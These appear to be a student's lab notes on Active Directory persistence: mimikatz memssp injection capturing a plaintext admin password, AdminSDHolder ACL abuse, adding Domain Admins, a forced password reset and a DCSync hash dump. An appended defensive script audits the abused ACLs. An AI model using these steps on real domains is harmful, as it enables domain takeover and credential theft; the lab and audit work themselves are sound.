Learning Objective - 12

Custom SSP

PS C:\AD\Tools> Invoke-Mimikatz -Command '"misc::memssp"' -ComputerName dcorp-dc

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 20 2021 19:01:18
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(powershell) # misc::memssp
Injected =)

PS C:\AD\Tools> cat \\dcorp-dc\c$\windows\system32\mimilsa.log
[00000000:006d432e] dcorp\Administrator *DollarMakesEveryoneHappy

PS C:\AD\Tools> cat \\dcorp-dc\c$\windows\system32\mimilsa.log
[00000000:006d432e] dcorp\Administrator *DollarMakesEveryoneHappy
[00000000:006d82d7] dcorp\Administrator *DollarMakesEveryoneHappy
[00000000:006db07e] dcorp\Administrator *DollarMakesEveryoneHappy

AdminSDHolder

PS C:\AD\Tools> . .\PowerView.ps1
PS C:\AD\Tools> Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,dc=dollarcorp,dc=moneycorp,dc=local' -PrincipalIdentity student723 -Rights All -PrincipalDomain dollarcorp.moneycorp.local -TargetDomain dollarcorp.moneycorp.local -Verbose
VERBOSE: [Get-DomainObject] Get-DomainObject filter string:
(|(|(samAccountName=student723)(name=student723)(displayname=student723)))
VERBOSE: [Get-DomainSearcher] search base: LDAP://DC=dollarcorp,DC=moneycorp,DC=local
VERBOSE: [Invoke-LDAPQuery] filter string:
(&(|(|(samAccountName=student723)(name=student723)(displayname=student723))))
VERBOSE: [Get-DomainObject] Error disposing of the Results object: Method invocation failed because
[System.DirectoryServices.SearchResult] does not contain a method named 'dispose'.
VERBOSE: [Get-DomainObject] Get-DomainObject filter string:
(|(distinguishedname=CN=AdminSDHolder,CN=System,dc=dollarcorp,dc=moneycorp,dc=local))
VERBOSE: [Get-DomainSearcher] search base: LDAP://DC=dollarcorp,DC=moneycorp,DC=local
VERBOSE: [Invoke-LDAPQuery] filter string:
(&(|(distinguishedname=CN=AdminSDHolder,CN=System,dc=dollarcorp,dc=moneycorp,dc=local)))
VERBOSE: [Get-DomainObject] Error disposing of the Results object: Method invocation failed because
[System.DirectoryServices.SearchResult] does not contain a method named 'dispose'.
VERBOSE: [Add-DomainObjectAcl] Granting principal CN=student723,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local 'All' on
CN=AdminSDHolder,CN=System,DC=dollarcorp,DC=moneycorp,DC=local
VERBOSE: [Add-DomainObjectAcl] Granting principal CN=student723,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local rights
GUID '00000000-0000-0000-0000-000000000000' on CN=AdminSDHolder,CN=System,DC=dollarcorp,DC=moneycorp,DC=local
PS C:\AD\Tools>

This is visible in BloodHound.

PS C:\AD\Tools> . .\Invoke-SDPropagator.ps1
PS C:\AD\Tools> Invoke-SDPropagator -timeoutMinutes 1 -showProgress -Verbose
VERBOSE: PDC Located at dcorp-dc.dollarcorp.moneycorp.local
VERBOSE: Initiating SD Propogation on dcorp-dc.dollarcorp.moneycorp.local
VERBOSE: Checking for start of SD Propagator

Adding a user as domain admin

We validate our permissions.

PS C:\ad\tools> . .\PowerView.ps1
PS C:\ad\tools> Get-DomainObjectAcl -Identity 'Domain Admins' -ResolveGUIDs | ForEach-Object {$_ | Add-Member NoteProperty 'IdentityName' $(Convert-SidToName $_.SecurityIdentifier);$_} | ?{$_.IdentityName -match "student723"}


AceType               : AccessAllowed
ObjectDN              : CN=Domain Admins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : GenericAll
OpaqueLength          : 0
ObjectSID             : S-1-5-21-719815819-3726368948-3917688648-512
InheritanceFlags      : None
BinaryLength          : 36
IsInherited           : False
IsCallback            : False
PropagationFlags      : None
SecurityIdentifier    : S-1-5-21-719815819-3726368948-3917688648-13603
AccessMask            : 983551
AuditFlags            : None
AceFlags              : None
AceQualifier          : AccessAllowed
IdentityName          : dcorp\student723

We verify that the user testda is not a domain admin.

PS C:\ad\tools> net user testda /dom
The request will be processed at a domain controller for domain dollarcorp.moneycorp.local.

User name                    testda
Full Name                    test da
Comment                      Not what the name implies ;)
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            11/14/2022 9:06:38 AM
Password expires             Never
Password changeable          11/15/2022 9:06:38 AM
Password required            Yes
User may change password     No

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   Never

Logon hours allowed          All

Local Group Memberships
Global Group memberships     *Domain Users
The command completed successfully.

Now we add it.

PS C:\ad\tools> Add-DomainGroupMember -Identity 'Domain Admins' -Members testda -Verbose
VERBOSE: [Add-DomainGroupMember] Adding member 'testda' to group 'Domain Admins'

We verify again.

PS C:\ad\tools> net user testda /dom
The request will be processed at a domain controller for domain dollarcorp.moneycorp.local.

User name                    testda
Full Name                    test da
Comment                      Not what the name implies ;)
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            11/14/2022 9:06:38 AM
Password expires             Never
Password changeable          11/15/2022 9:06:38 AM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   Never

Logon hours allowed          All

Local Group Memberships
Global Group memberships     *Domain Admins        *Domain Users
The command completed successfully.

We can also remove users.

PS C:\ad\tools> Remove-DomainGroupMember -Identity 'Domain Admins' -Members testda -Verbose
VERBOSE: [Remove-DomainGroupMember] Removing member 'testda' from group 'Domain Admins'
True
PS C:\ad\tools> net user testda /dom
The request will be processed at a domain controller for domain dollarcorp.moneycorp.local.

User name                    testda
Full Name                    test da
Comment                      Not what the name implies ;)
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            11/14/2022 9:06:38 AM
Password expires             Never
Password changeable          11/15/2022 9:06:38 AM
Password required            Yes
User may change password     No

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   Never

Logon hours allowed          All

Local Group Memberships
Global Group memberships     *Domain Users
The command completed successfully.

Forcing a password change

We add the password reset permission.

PS C:\AD\Tools> Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,dc=dollarcorp,dc=moneycorp,dc=local' -PrincipalIdentity student723 -Rights ResetPassword -PrincipalDomain dollarcorp.moneycorp.local -TargetDomain dollarcorp.moneycorp.local -Verbose
VERBOSE: [Get-DomainObject] Get-DomainObject filter string:
(|(|(samAccountName=student723)(name=student723)(displayname=student723)))
VERBOSE: [Get-DomainSearcher] search base: LDAP://DC=dollarcorp,DC=moneycorp,DC=local
VERBOSE: [Invoke-LDAPQuery] filter string:
(&(|(|(samAccountName=student723)(name=student723)(displayname=student723))))
VERBOSE: [Get-DomainObject] Error disposing of the Results object: Method invocation failed because
[System.DirectoryServices.SearchResult] does not contain a method named 'dispose'.
VERBOSE: [Get-DomainObject] Get-DomainObject filter string:
(|(distinguishedname=CN=AdminSDHolder,CN=System,dc=dollarcorp,dc=moneycorp,dc=local))
VERBOSE: [Get-DomainSearcher] search base: LDAP://DC=dollarcorp,DC=moneycorp,DC=local
VERBOSE: [Invoke-LDAPQuery] filter string:
(&(|(distinguishedname=CN=AdminSDHolder,CN=System,dc=dollarcorp,dc=moneycorp,dc=local)))
VERBOSE: [Get-DomainObject] Error disposing of the Results object: Method invocation failed because
[System.DirectoryServices.SearchResult] does not contain a method named 'dispose'.
VERBOSE: [Add-DomainObjectAcl] Granting principal CN=student723,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
'ResetPassword' on CN=AdminSDHolder,CN=System,DC=dollarcorp,DC=moneycorp,DC=local
VERBOSE: [Add-DomainObjectAcl] Granting principal CN=student723,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local rights
GUID '00299570-246d-11d0-a768-00aa006e0529' on CN=AdminSDHolder,CN=System,DC=dollarcorp,DC=moneycorp,DC=local

We run Invoke-SDPropagator to apply the changes right away.

PS C:\AD\Tools> Invoke-SDPropagator -timeoutMinutes 1 -showProgress -Verbose
VERBOSE: PDC Located at dcorp-dc.dollarcorp.moneycorp.local
VERBOSE: Initiating SD Propogation on dcorp-dc.dollarcorp.moneycorp.local
VERBOSE: Checking for start of SD Propagator

We verify the permissions:

PS C:\ad\tools> Get-DomainObjectAcl -Identity 'Domain Admins' -ResolveGUIDs | ForEach-Object {$_ | Add-Member NoteProperty 'IdentityName' $(Convert-SidToName $_.SecurityIdentifier);$_} | ?{$_.IdentityName -match "student723"}


AceQualifier           : AccessAllowed
ObjectDN               : CN=Domain Admins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights  : ExtendedRight
ObjectAceType          : User-Force-Change-Password
ObjectSID              : S-1-5-21-719815819-3726368948-3917688648-512
InheritanceFlags       : None
BinaryLength           : 56
AceType                : AccessAllowedObject
ObjectAceFlags         : ObjectAceTypePresent
IsCallback             : False
PropagationFlags       : None
SecurityIdentifier     : S-1-5-21-719815819-3726368948-3917688648-13603
AccessMask             : 256
AuditFlags             : None
IsInherited            : False
AceFlags               : None
InheritedObjectAceType : All
OpaqueLength           : 0
IdentityName           : dcorp\student723

Attempting to reset the password.

PS C:\ad\tools> Set-DomainUserPassword -Identity testda -AccountPassword (ConvertTo-SecureString "Bromita123!" -AsPlainText -Force) -Verbose
VERBOSE: [Set-DomainUserPassword] Attempting to set the password for user 'testda'
VERBOSE: [Set-DomainUserPassword] Password for user 'testda' successfully reset

Based on what was observed in these tests, it is recommended not to set more than one permission per ACL on AdminSDHolder.

Rights Abuse

We check whether the user can perform DCSync.

$ crackmapexec smb 172.16.2.1 -u student723 -p 'hT3qDFRHGzVpJtym' --ntds
SMB         172.16.2.1      445    DCORP-DC         [*] Windows 10.0 Build 20348 x64 (name:DCORP-DC) (domain:dollarcorp.moneycorp.local) (signing:True) (SMBv1:False)
SMB         172.16.2.1      445    DCORP-DC         [+] dollarcorp.moneycorp.local\student723:hT3qDFRHGzVpJtym 
SMB         172.16.2.1      445    DCORP-DC         [-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
SMB         172.16.2.1      445    DCORP-DC         [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB         172.16.2.1      445    DCORP-DC         [-] DRSR SessionError: code: 0x20f7 - ERROR_DS_DRA_BAD_DN - The distinguished name specified for this replication operation is invalid.

Then we assign the permissions:

PS C:\AD\Tools> Add-DomainObjectAcl -TargetIdentity 'DC=dollarcorp,DC=moneycorp,DC=local' -PrincipalIdentity student723 -Rights All -PrincipalDomain dollarcorp.moneycorp.local -TargetDomain dollarcorp.moneycorp.local -Verbose
VERBOSE: [Get-DomainObject] Get-DomainObject filter string:
(|(|(samAccountName=student723)(name=student723)(displayname=student723)))
VERBOSE: [Get-DomainSearcher] search base: LDAP://DC=dollarcorp,DC=moneycorp,DC=local
VERBOSE: [Invoke-LDAPQuery] filter string:
(&(|(|(samAccountName=student723)(name=student723)(displayname=student723))))
VERBOSE: [Get-DomainObject] Error disposing of the Results object: Method invocation failed because
[System.DirectoryServices.SearchResult] does not contain a method named 'dispose'.
VERBOSE: [Get-DomainObject] Get-DomainObject filter string: (|(distinguishedname=DC=dollarcorp,DC=moneycorp,DC=local))
VERBOSE: [Get-DomainSearcher] search base: LDAP://DC=dollarcorp,DC=moneycorp,DC=local
VERBOSE: [Invoke-LDAPQuery] filter string: (&(|(distinguishedname=DC=dollarcorp,DC=moneycorp,DC=local)))
VERBOSE: [Get-DomainObject] Error disposing of the Results object: Method invocation failed because
[System.DirectoryServices.SearchResult] does not contain a method named 'dispose'.
VERBOSE: [Add-DomainObjectAcl] Granting principal CN=student723,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local 'All' on
DC=dollarcorp,DC=moneycorp,DC=local
VERBOSE: [Add-DomainObjectAcl] Granting principal CN=student723,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local rights
GUID '00000000-0000-0000-0000-000000000000' on DC=dollarcorp,DC=moneycorp,DC=local

The assigned permission can be verified in BloodHound.

We try DCSync again.

$ crackmapexec smb 172.16.2.1 -u student723 -p 'hT3qDFRHGzVpJtym' --ntds
SMB         172.16.2.1      445    DCORP-DC         [*] Windows 10.0 Build 20348 x64 (name:DCORP-DC) (domain:dollarcorp.moneycorp.local) (signing:True) (SMBv1:False)
SMB         172.16.2.1      445    DCORP-DC         [+] dollarcorp.moneycorp.local\student723:hT3qDFRHGzVpJtym 
SMB         172.16.2.1      445    DCORP-DC         [-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
SMB         172.16.2.1      445    DCORP-DC         [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB         172.16.2.1      445    DCORP-DC         Administrator:500:aad3b435b51404eeaad3b435b51404ee:af0686cc0ca8f04df42210c9ac980760:::
SMB         172.16.2.1      445    DCORP-DC         Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         172.16.2.1      445    DCORP-DC         krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4e9815869d2090ccfca61c1fe0d23986:::
SMB         172.16.2.1      445    DCORP-DC         sqladmin\sqladmin:1113:aad3b435b51404eeaad3b435b51404ee:07e8be316e3da9a042a9cb681df19bf5:::
SMB         172.16.2.1      445    DCORP-DC         websvc\websvc:1114:aad3b435b51404eeaad3b435b51404ee:cc098f204c5887eaa8253e7c2749156f:::
SMB         172.16.2.1      445    DCORP-DC         srvadmin\srvadmin:1115:aad3b435b51404eeaad3b435b51404ee:a98e18228819e8eec3dfa33cb68b0728:::
SMB         172.16.2.1      445    DCORP-DC         appadmin\appadmin:1117:aad3b435b51404eeaad3b435b51404ee:d549831a955fee51a43c83efb3928fa7:::
SMB         172.16.2.1      445    DCORP-DC         svcadmin\svcadmin:1118:aad3b435b51404eeaad3b435b51404ee:b38ff50264b74508085d82c69794a4d8:::
SMB         172.16.2.1      445    DCORP-DC         testda\testda:1119:aad3b435b51404eeaad3b435b51404ee:a16452f790729fa34e8f3a08f234a82c:::
SMB         172.16.2.1      445    DCORP-DC         mgmtadmin\mgmtadmin:1120:aad3b435b51404eeaad3b435b51404ee:95e2cd7ff77379e34c6e46265e75d754:::

Just as all permissions were granted on the domain root (DC=dollarcorp,DC=moneycorp,DC=local), it is also possible to grant only the permissions needed for DCSync:

Add-DomainObjectAcl -TargetIdentity 'DC=dollarcorp,DC=moneycorp,DC=local' -PrincipalIdentity student723 -Rights DCSync -PrincipalDomain dollarcorp.moneycorp.local -TargetDomain dollarcorp.moneycorp.local -Verbose
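A defensive counterpart to the AdminSDHolder and DCSync permission abuse shown in the two sections above, added here and not part of these CRTP notes: it reads the security descriptor of AdminSDHolder and of the domain root through the RSAT ActiveDirectory module's AD: drive and reports every principal outside an assumed default baseline that holds GenericAll/WriteDacl/WriteOwner, the User-Force-Change-Password right, or one of the three replication rights DCSync needs. The baseline regex, the function name and the output fields are assumptions; the four GUIDs are Microsoft's documented control-access right GUIDs (the first one also appears in the -Rights ResetPassword output above).

```powershell
# Added defensive audit (not part of the CRTP notes). Assumes the RSAT ActiveDirectory
# module, which provides the AD: drive, and read access to both security descriptors.
Import-Module ActiveDirectory

# Control-access right GUIDs documented by Microsoft; the first is the one the lab
# granted with -Rights ResetPassword, the other three are what -Rights DCSync grants.
$RightGuids = @{
    '00299570-246d-11d0-a768-00aa006e0529' = 'User-Force-Change-Password'
    '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes'
    '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes-All'
    '89e95b76-444d-4c62-991a-0facbeda640c' = 'DS-Replication-Get-Changes-In-Filtered-Set'
}
# Assumed baseline of principals that hold these rights in a default domain. Extend it
# with legitimate product accounts (e.g. the Azure AD Connect sync account) before use.
$Baseline = '^(NT AUTHORITY\\SYSTEM|BUILTIN\\Administrators|.*\\Domain Admins|' +
            '.*\\Enterprise Admins|.*\\Domain Controllers|.*\\Enterprise Domain Controllers|' +
            '.*\\Enterprise Read-only Domain Controllers)$'

function Get-UnexpectedAce {
    param([Parameter(Mandatory)][string]$DistinguishedName)
    $acl = Get-Acl -Path "AD:\$DistinguishedName"
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($ace.IdentityReference.Value -match $Baseline) { continue }
        $rights = $ace.ActiveDirectoryRights.ToString()
        $guid   = $ace.ObjectType.ToString()
        # Three things to flag: broad rights (what -Rights All leaves behind as GenericAll),
        # one of the named control-access rights, or ExtendedRight with the null GUID,
        # which means every extended right at once.
        $broad  = $rights -match 'GenericAll|WriteDacl|WriteOwner'
        $named  = $RightGuids.ContainsKey($guid)
        $allExt = ($rights -match 'ExtendedRight') -and ($guid -eq [Guid]::Empty.ToString())
        if (-not ($broad -or $named -or $allExt)) { continue }
        $detail = '-'
        if ($named) { $detail = $RightGuids[$guid] } elseif ($allExt) { $detail = 'all extended rights' }
        [pscustomobject]@{
            Object    = $DistinguishedName
            Principal = $ace.IdentityReference.Value
            Rights    = $rights
            Detail    = $detail
            Inherited = $ace.IsInherited
        }
    }
}
$domainDn = (Get-ADDomain).DistinguishedName
# AdminSDHolder first (SDProp copies its ACL onto every protected object), then the
# domain root, where the replication rights above are exactly what DCSync needs.
@("CN=AdminSDHolder,CN=System,$domainDn", $domainDn) | ForEach-Object { Get-UnexpectedAce -DistinguishedName $_ } | Format-Table -AutoSize
```

Run it as a domain user before and after the lab steps above: the student723 ACEs that Add-DomainObjectAcl created (GenericAll, User-Force-Change-Password, and the replication rights) are the rows it should report.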
